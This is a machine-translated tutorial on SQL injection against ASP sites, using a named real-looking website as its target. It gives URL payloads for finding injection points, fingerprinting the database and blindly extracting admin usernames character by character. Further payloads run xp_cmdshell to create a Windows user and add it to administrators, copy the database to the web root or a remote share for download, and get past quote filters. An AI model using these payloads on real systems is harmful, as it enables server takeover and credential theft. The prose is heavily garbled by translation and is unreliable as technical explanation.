If you haven't tried SQL injection, then the first step will first put the IE menu => tool => Internet option => Advanced => Show friendly HTTP error message to go out. Otherwise, no matter what the server returns, IE is only displayed as an HTTP 500 server error, and more prompt information cannot be obtained. In the first quarter, SQL injection principle begins with a website www.19cn.com (Note: This article has been approved by this station long agreed, most of them are real data). On the homepage of the website, there are "IE can't open a new window" link, the address is: http://www.19cn.com/showdetail.asp? Id = 49, we add this address after this address Single number ', the server will return the following fault
Error Tip: Microsoft Jet Database Engine Errors 'Syntax Errors of' 80040e14 'Strings In Query Expressions' ID = 49 ''. /SHOWDETAIL.ASP, line 8
From this error prompt we can see the following:
1. The website is used by the Access database, connects the database via the JET engine, not through the ODBC. 2. The program does not determine whether the data submitted by the client meets the program requirements. 3. This SQL statement is inquired with a field of ID. From the above example we can know that the principle of SQL injection is to submit a special code from the client, resulting in the collection of procedures and servers, giving the information you want to get. In the second section, it is said that some people will feel that there are some people who can do it: I am not very simple to test, this is not very simple? In fact, this is not the best way, why? First, it is not necessarily that the IIS of each server is returned to the client. If the program is added to the client, if the program is added, SQL injection is not successful, but the server will also report an error, the specific prompt information is Error on the server when processing the URL. Please contact the system administrator. Second, some of the programmers who have a little understanding of SQL injection is considered to be safe, this situation is not a few, if you use single quotes test, you can't measure the injection point, what kind of Is the test method be more accurate? The answer is as follows:
1 http://www.19cn.com/showdetail.asp?id=49 2 http://www.19cn.com/showdetail.asp?id=49 and 1 = 1 3 http://www.19cn.com /SHOWDETAIL.ASP ?id=49 and 1 = 2 This is the classic 1 = 1, 1 = 2 test method, how to judge? See the results returned above three URLs: You can inject the performance:
1 Normal display (this is inevitable, otherwise it is wrong) 2 Normal display, content is basically the same as 1 the same 3 prompts BOF or EOF (the program does not make any judgment), or prompts not find the record (Judging RS. When EOF), or the content is empty (the program adds ON Error Resume next) If it is not possible to judge, 1 is also normal display, 2 and 3 generally have a program defined error message, or prompt type to convert . Of course, this is just the incoming parameter is the judgment method used by the digital type. When actual application, there will be character types and search type parameters, I will analyze the "SQL Injecting General Steps" in the intermediate level. Section III, determine the function of the database type and the injection method, the injection method is different, so we must judge the type of database before injection. General ASP's most frequently matched databases are ACCESS and SQLSERVER, one of more than 99% of websites online. How to let the program tell you what database it uses? Take a look: SQL Server has some system variables, if the server IIS prompt is not closed, and SQL Server returns an error prompt, then you can get directly from the error information, the method is as follows: http://www.19cn.com/showdetail.asp? Id = 49 and user> 0 This statement is simple, but it contains the essence of SQLServer's unique injection method. I also found this efficient susceptibility in a unintentional test. Let me see its meaning: First, the front statement is normal, focus on and user> 0, we know, User is a built-in variable of SQL Server, which is the user name currently connected, type NVARCHAR . Take a nVarchar value to the intra 0 comparison, the system will try to turn nvarchar's value to int type. Of course, the process will definitely errors in the process, and SQL Server error prompt is: convert the nVARCHAR value "ABC" conversion data type When INT's column, the syntax error occurs, huh, ABC is the value of the variable user, so that the power of the database is not scrapped. In the subsequent space, everyone will see a lot of statements with this method. By the way, it is well known that SQLServer's user sa is a role of equivominstrators permissions, got SA permissions, almost certainly gets the host's Administrator. The above method can be very convenient to test whether it is logged in with sa, if it is the SA login, the prompt is a column that converts "DBO" into an int to errors, not "SA". If the server IIS is not allowed to return an error prompt, how do you determine the database type? We can start from Access and SQL Server and distinguish, Access and Sql Server have its own system table, such as storing all objects in the database, Access is in system table [msysObjects], but read the table in the web environment " No permissions, "SQL Server is in the table [sysObjects], which can be read normally in a web environment.
In the case where you can inject, use the following statement: http://www.19cn.com/showdetail.asp? Id = 49 and (select count (*) from sysobjects> 0http://www.19cn.com /ShowDetail.asp?id=49 and (Select Count (*) from msysObjects> 0 If the database is SQL Server, then the page of the first URL with the original page http://www.19cn.com/showdetail.asp?id = 49 is substantially the same; and the second URL, because the table MsysObjects can not be found, it will prompt an error, even if the program has fault tolerance, the page is completely different from the original page. If the database uses Access, then the situation is different, the page of the first URL is completely different from the original page; the second URL, depending on whether the database settings are allowed to read the system table, generally not allowed Therefore, it is also completely different from the original website. In most cases, use the first URL to know the database type used by the system, and the second URL only uses authentication when IIS error prompt. Next, we continue to learn how to get the content you want to get from the database, first, let's take a look at the general steps in SQL injection: First, the general step of SQL injection first, determine the environment, find an injection point, determine the database Type, this has been introduced in the entry. Secondly, according to the type of injection parameter, the original appearance of the SQL statement is reconstructed in the mind. According to the parameter type, the following three are the following: (a) ID = 49 This type of injection parameter is a digital type, and the SQL statement is roughly as follows: SELECT * From Name WHERE Field = 49 Injection parameters is ID = 49 and [Query Condition], that is, generated statement: SELECT * FROM table name where field = 49 and [query condition] (b) Class = Continuous drama This type of injection parameter It is a character pattern, and the SQL statement is generally approrated: select * from the name of the WHERE field = 'series of injected parameters Class = Continuous drama' and "query conditions] and '' = ', that is, generate statements: SELECT * FROM table Name WHERE Field = 'Continuous Play' AND [Query Condition] and '' = '(c) No filtering parameters, such as keyword = keyword, SQL statement original is as follows: SELECT * FROM table name Where Field Like'% Keyword% 'injection parameter is keyword =' AND [query condition] and '% 25' = ', that is, generating statement: SELECT * FROM table name Where Field Like'% 'AND [Query Condition] and'% '= '%' Next, replace the query condition into a SQL statement, guess the table name, for example: program code: [Copy code to clipboard]
ID = 49 and (select count (*) from admin)> = 0
If the page is the same as ID = 49, the additional condition is established, that is, the table admin exists, that is, it does not exist (please keep this method). So loop until you guessed the name. After guess, replace count (*) into a count (field name), and specifically depends the word name. Some people will say: There are some casual components here. If the name is very complicated, it will not have to play. It is very pair, this world does not exist 100% successful hacker technology, flies do not seamless eggs, no matter how many technologies, a few hackers, because others are not strict or not, the user is not confidential. I have to get it. I have a little bit, saying it back, for SQL Server library, there is a way to let the program tell us the name and field name, we will introduce in the advanced article. Finally, after the table name and column name are successful, use the SQL statement to get the value of the field, and the most common method is described below. Although this method is very slow, it must be feasible Methods. We will give an example, known in the application admin, first, first, we take the first record, test length: http://www.19cn.com/showdetail.asp? Id = 49 and (select top 1 l UserName)> 0 First Description Principle: If the username length of TOP 1 is greater than 0, the condition is established; then it is> 1,> 2,> 3 so that the conditions are not established, such as> 7 is established,> 8 is not established, that is, len (username) = 8 Of course, no one will be stupid from 0, 1, 2, 3 one test, how to look at each play. After obtaining the length of the username, the nth character is intercepted with MID (username, n, 1), and then ASC (MID (UserName, N, 1)) Gets the ASCII code, such as: ID = 49 and (SELECT TOP 1 ASC ( MID (username, 1, 1)) from admin> 0 is also the ASCII code of the first character with a step-by-step range, pay attention to between the English and numbers of ASCII code between 1-128, can be used for half Method Accelerate the guess, if the program is written, the efficiency will have great improvement. In the second section, the SQL injection common function has a SQL language-based person, and the success rate is much higher than when SQL injection is more than unfamiliar. We must improve our SQL level, especially some common functions and orders.
Access: ASC (Character) SQLServer: Unicode (Character) Returning ASCII code Access: chr (number) SQLServer: nchar (Number) effect: In contrast to ASC, return character access: MID according to the ASCII code (string, N, l) SQLServer: Substring (String, N, L) Run: Returns the string from n characters from the sub string of the length L, ie a string access between N to N L: ABC (Digital) SQL Server: ABC (Digital) Role: Returns the absolute value of the number (used when guessing Chinese characters) Access: a between b and c SQLServer: a betWeen B And C action: Judgment A is bound between B and C In the third quarter, the Chinese processing method encounters the Chinese characters in the injecting. Some people want to fight back in a Chinese character. In fact, as long as you know Chinese coding, "Chinese phobia" can quickly overcome. Let's talk about a little common sense: Access, Chinese ASCII code may have a negative number, take out the negative of the negative, with ABS () to take the absolute value, the Chinese characters unchanged. In SQL Server, Chinese ASCII is positive, but since it is a two-bit encoding of Unicode, the ASCII code cannot be obtained using a function ascii (), and the function unicode () must be used to return the corresponding Chinese character with the nchar function. After understanding the two points above, if you think Chinese guess is actually almost the same as English? In addition to the function of use, it is important to pay attention to the specification, the method is nothing wrong. In the first quarter, use the system table to inject SQLServer database SQLServer is a powerful database system, which has a close relationship with the operating system, which brings great convenience to developers, but on the other hand, it provides the injection. A springboard, let's take a look at several specific examples: 1 http://site/url.asp? Id = 1; exec master@xp_cmdshell 'net user name password / add' - semicolon; in SQLServer Indicates the two sentences before and after, - indicates that the following statement is a comment, so this statement will be divided into two sentences in SQL Server, first of the SELECT Id = 1 record, then execute the stored procedure XP_cmdshell, this storage process Used to call the system command, then use the net command to create a new user name, password for the Windows account, then: 2 http://site/url.asp? Id = 1; exec master..xp_cmdshell 'net Localgroup name administrators / add '- Add the new account name to the administrator group, don't use two minutes, you have already got the highest authority of the system! Of course, this method is only applicable to the case where the database is connected to the SA, otherwise, there is no permission to call XP_cmdshell. 3 http://site/url.asp? Id = 1 ;; And db_name ()> 0 There is a similar example and user> 0, the role is to get the connection user name, db_name () is another system variable, return It is a connected database name.
4 http://site/url.asp? Id = 1; Backup Database database name to disk = 'c: /inetpub/wwroot/1.db'; - This is quite awkward, from 3 to Database name, plus some IIS error exposed absolute path, back up the database back to the web directory, and use HTTP to complete the entire database over the entire download, all administrators and user passwords are unfair! When you don't know the absolute path, you can also back up the method of the network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high. 5 http://site/url.asp? Id = 1 ;; And (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0 said that sysobjects is the system table of SQL Server, stored All table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement is removed, and the 0 is relatively small, let the error message table Name exposes. Second, how to get the third table name? Or leave our smart readers think. 6 http://site/url.asp? Id = 1 ;; And (select top 1 col_name (Object_ID ('Name'), 1) After getting the table name from 5, use Object_ID (' Table name ') Get internal ID, col_name (Name ID, 1) of the table name represents the first field name of the table, and replace it with 2, 3, 4 ... you can get the specified table one by one The field name inside. The above 6 points is that I have studied SQL Server injection of hardcore crystals, it can be seen that the degree of understanding of SQL Server directly affects success rate and guessing speed. After I study SQLServer injection, I also got a lot of improvement in development, huh, maybe safety and development was completed. In the second section, bypassing the program restrictions continue to inject in the entry section, there are many people like to use the 'number of injection vulnerabilities, so there are many people who use the filter' to "prevent" to inject vulnerabilities, this may block some entry Attack, but people who are more familiar with SQL, or can use the related functions to achieve the purpose of bypassing program restrictions. In the "SQL Injection" section, the statements I have use have been optimized, so that they do not include single quotes; in the "Using the System Table Inject into the SQLServer Database", some statements contain a 'number, We give an example to see how to transform these statements: Simple, such as WHERE XTYPE = 'u', the ASCII code corresponding to the character u is 85, so you can use where xtype = char (85) instead; if the character is Chinese, for example Where name = 'user', can be replaced with WHERE Name = nchar (29992) NCHAR (25143). Section III, experience summatation 1. Some people will filter these keywords, but forget the case of case sensation, so everyone can try it with Select.
